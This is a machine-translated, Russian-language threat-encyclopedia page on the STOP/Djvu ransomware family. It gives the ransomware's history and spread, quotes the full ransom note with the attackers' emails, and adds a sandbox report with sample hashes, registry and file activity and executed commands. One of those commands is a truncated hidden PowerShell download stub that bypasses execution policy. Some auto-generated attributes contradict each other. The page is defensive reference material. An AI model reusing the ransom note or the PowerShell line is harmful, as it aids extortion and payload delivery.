ОСТАНОВИТЬ Djvu Ransomware

Семейство программ-вымогателей STOP, также называемое семейством программ-вымогателей STOP Djvu, представляет собой опасную вредоносную программу. STOP Djvu - лишь одна из множества угроз, которые имеют общие характеристики и исходят от программы-вымогателя STOP, хотя некоторые из их методов воздействия на типы файлов и шифрование расширений файлов различаются.
Первоначальная программа- вымогатель STOP была замечена исследователями безопасности еще в феврале 2018 года. Однако с тех пор она эволюционировала, и ее семейство клонов и ответвлений выросло. Основным методом распространения программы-вымогателя STOP были рассылки спама по электронной почте с использованием поврежденных вложений.
Программа-вымогатель STOP Djvu работает так же, как и другие подобные программы-вымогатели, шифруя и блокируя доступ к ключевым файлам, которые пользователи могут использовать в своей системе. Личные файлы, изображения, документы и многое другое можно зашифровать и отключить для всех пользователей машины. Программа-вымогатель STOP Djvu была впервые обнаружена еще в декабре 2018 года в ходе довольно успешной кампании заражения в Интернете. Исследователи не знали, как распространяется программа-вымогатель, но позже жертвы сообщали, что обнаруживали инфекции после того, как загружали кейгены или кряки. После заражения программа-вымогатель STOP Djvu изменяет настройки Windows, добавляя файлы с разными именами, например .djvu, .djvus, .djvuu, .uudjvu, .udjvu или .djvuq, а также недавние расширения .promorad и .promock. В более новых версиях еще нет дешифратора, но более старые версии можно расшифровать с помощью STOPDecrypter. Пользователям рекомендуется избегать уплаты выкупа, несмотря ни на что.
Метод, используемый для блокировки доступа к файлам, использует алгоритм шифрования RSA. Хотя расшифровка файлов может показаться сложной для неопытных пользователей, определенно нет необходимости прилагать какие-либо усилия, чтобы заплатить людям, стоящим за угрозой. В таких ситуациях обычно даются ложные обещания, поэтому пользователи могут быстро обнаружить, что они игнорируются после совершения платежей.
Об атаках вымогателя STOP Djvu впервые было сообщено в конце 2018 года. Основным методом распространения STOP Djvu оставались спам-письма, а изменения в ядре вымогателя были относительно незначительными. Большинство фальшивых, скомпрометированных вложений, используемых в спам-письмах, были офисными документами с поддержкой макросов или поддельными файлами PDF, которые запускали программу-вымогатель без ведома жертвы. Поведение STOP Djvu также не сильно изменилось - программа-вымогатель по-прежнему удаляет все моментальные снимки теневого тома, чтобы избавиться от резервных копий, а затем начинает шифрование файлов жертвы.
В записку с требованием выкупа внесены незначительные изменения, которые сохраняются на рабочем столе жертвы как _openme.txt. Текст записки о выкупе можно найти здесь:
'[начало записки о выкупе]
———————— ВСЕ ВАШИ ФАЙЛЫ ЗАШИФРОВАНЫ ————————
Не волнуйтесь, вы можете вернуть все свои файлы!
Все ваши файлы, документы, фотографии, базы данных и другие важные данные зашифрованы с помощью самого надежного шифрования и уникального ключа.
Единственный способ восстановить файлы - это приобрести для вас инструмент дешифрования и уникальный ключ.
Это программное обеспечение расшифрует все ваши зашифрованные файлы.
Какие гарантии мы вам даем?
Вы можете отправить один из своих зашифрованных файлов со своего компьютера, и мы расшифруем его бесплатно.
Но мы можем бесплатно расшифровать только 1 файл. Файл не должен содержать ценной информации
Не пытайтесь использовать сторонние инструменты дешифрования, потому что они уничтожат ваши файлы.
Скидка 50% доступна, если вы свяжетесь с нами в первые 72 часа.
———————————————————————————————————-
Чтобы получить эту программу, вам необходимо написать на нашу электронную почту:
helphadow@india.com
Зарезервируйте адрес электронной почты, чтобы связаться с нами:
helphadow@firemail.cc
Ваш личный идентификатор: [строка]
[конец записки о выкупе] '
Программа-вымогатель изначально ограничивалась переименованием зашифрованных файлов с расширением .djvu, что было любопытным выбором, поскольку .djvu на самом деле является допустимым форматом файлов, разработанным лабораторией AT&T и используемым для хранения отсканированных документов, чем-то похожим на .pdf Adobe. Более поздние версии программы-вымогателя приняли ряд других расширений для зашифрованных файлов, в том числе '.chech', '' .luceq, '' .kroput1, '' .charck, '' .kropun, '.luces,' '.pulsar1, '' .uudjvu, '' .djvur, '' .tfude, '.tfudeq' и '.tfudet'.
Некоторые разновидности программы-вымогателя STOP Djvu можно бесплатно расшифровать с помощью так называемого STOPDecrypter, разработанного исследователем безопасности Майклом Гиллеспи и доступного для бесплатной загрузки в Интернете.
Оглавление
ОСТАНОВИТЬ Djvu Ransomware Видео
Совет: Включите звук ON и смотреть видео в полноэкранном режиме.

ОСТАНОВИТЬ Djvu Ransomware Скриншотов
Аналитический отчет
Главная Информация
| Фамилия: | STOP/DJVU Ransomware |
|---|---|
| Статус подписи: | No Signature |
Известные образцы
Известные образцы
В этом разделе перечислены другие образцы файлов, предположительно связанные с этой семьей.|
MD5:
def8a7bfe5fe47d95a95085d8dbc7a53
ША1:
7182d4b2f55a560d83edf0824e119f71fa8422b6
SHA256:
B83855EA63E7F28396099A5B6E877BE537E78E4A50DF720262461A1D13B02192
Размер файла:
6.29 MB, 6292105 байт
|
|
MD5:
a6b8c0cb178c31dd347554c3e5a0d5f8
ША1:
91864f269d696ee80869cfeb3c9a204f8031a3bb
SHA256:
4FFB8E9ADF508662B5E51CBEC75B2E07CE1CBBFAAB873F72EDC7BAC385421E2C
Размер файла:
3.47 MB, 3471869 байт
|
|
MD5:
2336c9624d9a44c393d354206226f508
ША1:
ea7edc388ad62990f52b9ed40df26d20f4e20190
SHA256:
CE48ED04C92143B7E91F9665DD9337B2EE0B9CC1B5AEE534D26C09E084F8ABB0
Размер файла:
1.36 MB, 1359918 байт
|
|
MD5:
42f32aa699bc45a3638ddeb325ebebc1
ША1:
508cea3ba2bf04cc6851295f92bf0e752071f6b8
SHA256:
16532B38591B713395C288B11610494BCC4C4537BE492D43C54D66FEB7B95FA4
Размер файла:
1.33 MB, 1328186 байт
|
|
MD5:
2391d41548b6432191f73edefa273928
ША1:
620b714f84955aa7fb9a2f2cd528daa1621e18af
SHA256:
4D1EFAA3477B0B8D84025F3F0109E97ABA7CEB37F174B9DC79B7966CBB430959
Размер файла:
3.36 MB, 3357556 байт
|
Показать больше
|
MD5:
710c3a1beb616d4aa7d5ed9a7f8848e4
ША1:
326da9ddc0ea840e83f31fbf1f3377a06c911fe5
SHA256:
051DAB5E5247E25D6EB059A574383FB1EC99A5A4AAF9AA3694240FE25FA260AB
Размер файла:
1.36 MB, 1364106 байт
|
|
MD5:
601b120a6f39f72847b2f581a3d5f158
ША1:
0cc5781c1cfe6c5d034bd098229773e80e083732
SHA256:
BEC2BFF460615A35D4EA35BF25E9F89337E35E73441A4AC07562CE8E89BED818
Размер файла:
4.86 MB, 4858569 байт
|
|
MD5:
a7b76a49f289081961f8f3824f0b62ca
ША1:
6908790199785be7fc6c4eeb1fe426ee1b66cc0b
SHA256:
1A721E054386833AEBBF94C75871143376897E92C4A48278DDE95E6987634F45
Размер файла:
1.41 MB, 1406899 байт
|
|
MD5:
9f37930d62a1e08f68aa0a72472e7a55
ША1:
27706b3ff639e5dfa264a823dbe9229cf34ae153
SHA256:
29039902EEA4EE24C4C6368AA9B1D7F86BEC65ADA3ABDB0B92C1FEF311ACD31F
Размер файла:
600.12 KB, 600124 байт
|
|
MD5:
7a18839fe61e9cde0e8fea3100acfb2b
ША1:
9476c97a73e027016e9f6f2f20c2fb19264cd837
SHA256:
0271095F0AD5C6F26C9738ED5636E751B8868C1AE3B08D5D8C5218121D9FEEAF
Размер файла:
316.83 KB, 316832 байт
|
|
MD5:
fe17d0f940a226e80cc18b4399da4ffc
ША1:
cc1bd23b0c7ff5da8ff996717b3969b7ebb9c67b
SHA256:
D869A00DFA1BE0DF6D08BB72B790894D1861834D5E350F5DD54A70C3711BA713
Размер файла:
1.36 MB, 1363661 байт
|
|
MD5:
ed83bea5600457af815495b10f235b87
ША1:
14ac62ce3ae6b19186544e46ad7710d1814e3a9c
SHA256:
FC0AE843E31F77574448FF343F0E92A9F1953B43DC2495FFE2CA5F7F8E777401
Размер файла:
9.59 MB, 9590154 байт
|
|
MD5:
8cc4ef6bfd98074474e53cefc0029d0a
ША1:
7604b8cd9736a016748a1d2d1fe3eb9ec9db1bc9
SHA256:
72BE2A65C8E36058A40FB1EF582E944721F5D041044F454509242E00E6745198
Размер файла:
1.41 MB, 1407173 байт
|
|
MD5:
75e7ec1010908f6cf964ee32c9d57fed
ША1:
7cccec52318eadb6771ceef6404e19fc46ec8d07
SHA256:
A309D56010D51F07741773ABCC44C767EF99C1031DEFA575F07D11DD11F09E35
Размер файла:
2.44 MB, 2442353 байт
|
Атрибуты исполняемого файла Windows Portable
- File doesn't have "Rich" header
- File doesn't have debug information
- File doesn't have exports table
- File doesn't have relocations information
- File doesn't have security information
- File has exports table
- File has TLS information
- File is 32-bit executable
- File is 64-bit executable
- File is either console or GUI application
Показать больше
- File is GUI application (IMAGE_SUBSYSTEM_WINDOWS_GUI)
- File is Native application (NOT .NET application)
- File is not packed
- IMAGE_FILE_DLL is not set inside PE header (Executable)
- IMAGE_FILE_EXECUTABLE_IMAGE is set inside PE header (Executable Image)
Значки файлов
Значки файлов
В этом разделе отображаются значки, найденные в образцах вредоносных программ. Вредоносные программы часто копируют значки, обычно ассоциируемые с легитимным программным обеспечением, чтобы ввести пользователей в заблуждение и заставить их поверить в безопасность вредоносной программы.Информация о версии Windows PE
Информация о версии Windows PE
В этом разделе отображаются значения и атрибуты, установленные в структуре данных информации о версии файла Windows для образцов этого семейства. Чтобы ввести пользователей в заблуждение, злоумышленники часто добавляют поддельную информацию о версии, имитирующую легитимное программное обеспечение.| имя | Ценность |
|---|---|
| Assembly Version | 1.4.1.0 |
| Comments | This installation was built with Inno Setup. |
| Company Name |
|
| File Description |
|
| File Version |
Показать больше
|
| Internal Name |
|
| Legal Copyright |
|
| Original Filename |
|
| Product Name |
Показать больше
|
| Product Version |
Показать больше
|
Цифровые подписи
Цифровые подписи
В этом разделе перечислены цифровые подписи, прикрепленные к образцам из этого семейства. При анализе и проверке цифровых подписей важно убедиться, что корневой орган, ответственный за подпись, является известным и заслуживающим доверия субъектом, а также что статус подписи является действительным. Вредоносное ПО часто подписывается ненадежными «самоподписанными» цифровыми подписями (которые могут быть легко созданы автором вредоносного ПО без проверки). Вредоносное ПО также может быть подписано легитимными подписями, имеющими недействительный статус, а также подписями от сомнительных корневых органов с поддельными или вводящими в заблуждение именами «подписывающих лиц».| Подписавший | Корень | Статус |
|---|---|---|
| win.rar GmbH | DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1 | Self Signed |
| win.rar GmbH | GlobalSign CodeSigning CA - SHA256 - G3 | Hash Mismatch |
Характеристики файла
- .NET
- 2+ executable sections
- big overlay
- fptable
- HighEntropy
- Inno
- InnoSetup Installer
- Installer Manifest
- Installer Version
- MZ (In Overlay)
Показать больше
- No Version Info
- Nullsoft Installer
- RAR (In Overlay)
- RARinO
- Run
- SusSec
- vb6
- WinRAR SFX
- WRARSFX
- x64
- x86
Файлы изменены
Файлы изменены
В этом разделе перечислены файлы, созданные, измененные, перемещенные и/или удаленные образцами из этого семейства. Активность файловой системы может дать ценную информацию о том, как вредоносное ПО функционирует в операционной системе.| Файл | Атрибуты |
|---|---|
| \device\namedpipe | Generic Read,Write Attributes |
| \device\namedpipe | Generic Write,Read Attributes |
| \device\namedpipe\gmdasllogger | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\is-13e8d.tmp\508cea3ba2bf04cc6851295f92bf0e752071f6b8_0001328186.tmp | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\is-2buvv.tmp\_isetup\_setup64.tmp | Generic Read,Write Data,Write Attributes,Write extended,Append data |
| c:\users\user\appdata\local\temp\is-88uan.tmp\ea7edc388ad62990f52b9ed40df26d20f4e20190_0001359918.tmp | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\is-8gkji.tmp\0cc5781c1cfe6c5d034bd098229773e80e083732_0004858569.tmp | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\is-af9e7.tmp\_isetup\_setup64.tmp | Generic Read,Write Data,Write Attributes,Write extended,Append data |
| c:\users\user\appdata\local\temp\is-bfiig.tmp\_isetup\_setup64.tmp | Generic Read,Write Data,Write Attributes,Write extended,Append data |
| c:\users\user\appdata\local\temp\is-dlucn.tmp\7604b8cd9736a016748a1d2d1fe3eb9ec9db1bc9_0001407173.tmp | Generic Write,Read Attributes |
Показать больше
| c:\users\user\appdata\local\temp\is-du263.tmp\326da9ddc0ea840e83f31fbf1f3377a06c911fe5_0001364106.tmp | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\is-i0kj9.tmp\6908790199785be7fc6c4eeb1fe426ee1b66cc0b_0001406899.tmp | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\is-jos42.tmp\_isetup\_setup64.tmp | Generic Read,Write Data,Write Attributes,Write extended,Append data |
| c:\users\user\appdata\local\temp\is-l4opd.tmp\cc1bd23b0c7ff5da8ff996717b3969b7ebb9c67b_0001363661.tmp | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\is-pk5hm.tmp\_isetup\_setup64.tmp | Generic Read,Write Data,Write Attributes,Write extended,Append data |
| c:\users\user\appdata\local\temp\is-r9udb.tmp\_isetup\_setup64.tmp | Generic Read,Write Data,Write Attributes,Write extended,Append data |
| c:\users\user\appdata\local\temp\is-shkd6.tmp\_isetup\_setup64.tmp | Generic Read,Write Data,Write Attributes,Write extended,Append data |
| c:\users\user\appdata\local\temp\nshfa46.tmp\chip.bmp | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\nshfa46.tmp\header.bmp | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\nshfa46.tmp\nsdialogs.dll | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\nshfa46.tmp\screenshot.bmp | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\nshfa46.tmp\system.dll | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\nshfa46.tmp\winrar-x64-721b1ru.exe | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\nshfa46.tmp\yandex.bmp | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\nshfa46.tmp\yandexbrowsersetup.exe | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\nsrfa35.tmp | Generic Read,Write Data,Write Attributes,Write extended,Append data,Delete |
| c:\users\user\appdata\local\temp\nsva331.tmp\banner.dll | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\nsva331.tmp\nsexec.dll | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\nsva331.tmp\system.dll | Generic Write,Read Attributes |
Изменения в реестре
Изменения в реестре
В этом разделе перечислены ключи и значения реестра, которые были созданы, изменены и/или удалены образцами из этого семейства. Активность реестра Windows может дать ценную информацию о функциональности вредоносных программ. Кроме того, вредоносные программы часто создают значения реестра, чтобы автоматически запускаться и неограниченно существовать после того, как первоначальное заражение скомпрометировало систему.| Ключ::Значение | Данные | Название API |
|---|---|---|
| HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75 | wk � 8�jg�B �� �6 �v�� 7� �� �� ۀ�� � T�B� ����� ���%�� 3bBx �<�� �!#��$kF$�� %`� %�&� &�-'�!(�(X�(�) ;)E)�`*J*9*�",=� -!R0P%1`1�1HO 5,]5�G>�� @V� @�*A��BB�� E�mF | RegNtPreCreateKey |
| HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe | 졷鑂셱ǜ | RegNtPreCreateKey |
Использование API Windows
Использование API Windows
В этом разделе перечислены вызовы API Windows, используемые примерами из этого семейства. Анализ использования API Windows — это ценный инструмент, который может помочь выявить вредоносную активность, такую как перехват нажатий клавиш, повышение привилегий в системе безопасности, шифрование данных, утечка данных, вмешательство в работу антивирусного программного обеспечения и манипулирование сетевыми запросами.| Категория | API |
|---|---|
| Other Suspicious |
|
| Anti Debug |
|
| User Data Access |
|
| Process Manipulation Evasion |
|
| Process Shell Execute |
|
| Keyboard Access |
|
| Syscall Use |
Показать больше
|
| Encryption Used |
|
Выполнение команд оболочки
Выполнение команд оболочки
В этом разделе перечислены команды оболочки Windows, которые выполняются образцами этого семейства. Команды оболочки Windows часто используются вредоносным ПО в злонамеренных целях и могут применяться для повышения привилегий безопасности, загрузки и запуска другого вредоносного ПО, использования уязвимостей, сбора и кражи данных, а также сокрытия вредоносной активности.
"C:\Users\Lehsoaco\AppData\Local\Temp\is-88UAN.tmp\ea7edc388ad62990f52b9ed40df26d20f4e20190_0001359918.tmp" /SL5="$5036E,928289,131584,c:\users\user\downloads\ea7edc388ad62990f52b9ed40df26d20f4e20190_0001359918"
|
"C:\Users\Dfhrhqtz\AppData\Local\Temp\is-13E8D.tmp\508cea3ba2bf04cc6851295f92bf0e752071f6b8_0001328186.tmp" /SL5="$802E8,896816,131584,c:\users\user\downloads\508cea3ba2bf04cc6851295f92bf0e752071f6b8_0001328186"
|
"C:\Users\Eberzneu\AppData\Local\Temp\is-DU263.tmp\326da9ddc0ea840e83f31fbf1f3377a06c911fe5_0001364106.tmp" /SL5="$30364,932379,131584,c:\users\user\downloads\326da9ddc0ea840e83f31fbf1f3377a06c911fe5_0001364106"
|
"C:\Users\Qxnqehmu\AppData\Local\Temp\is-8GKJI.tmp\0cc5781c1cfe6c5d034bd098229773e80e083732_0004858569.tmp" /SL5="$402E8,3435751,309760,c:\users\user\downloads\0cc5781c1cfe6c5d034bd098229773e80e083732_0004858569"
|
"C:\Users\Qlwpcgcn\AppData\Local\Temp\is-I0KJ9.tmp\6908790199785be7fc6c4eeb1fe426ee1b66cc0b_0001406899.tmp" /SL5="$30336,975597,131584,c:\users\user\downloads\6908790199785be7fc6c4eeb1fe426ee1b66cc0b_0001406899"
|
Показать больше
powershell -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "try { $WebClient = New-Object System.Net.WebClient
|
"C:\Users\Czxnhiuo\AppData\Local\Temp\is-L4OPD.tmp\cc1bd23b0c7ff5da8ff996717b3969b7ebb9c67b_0001363661.tmp" /SL5="$40356,931898,131584,c:\users\user\downloads\cc1bd23b0c7ff5da8ff996717b3969b7ebb9c67b_0001363661"
|
"C:\Users\Rziyzfeg\AppData\Local\Temp\is-DLUCN.tmp\7604b8cd9736a016748a1d2d1fe3eb9ec9db1bc9_0001407173.tmp" /SL5="$1C02AC,975756,131584,c:\users\user\downloads\7604b8cd9736a016748a1d2d1fe3eb9ec9db1bc9_0001407173"
|


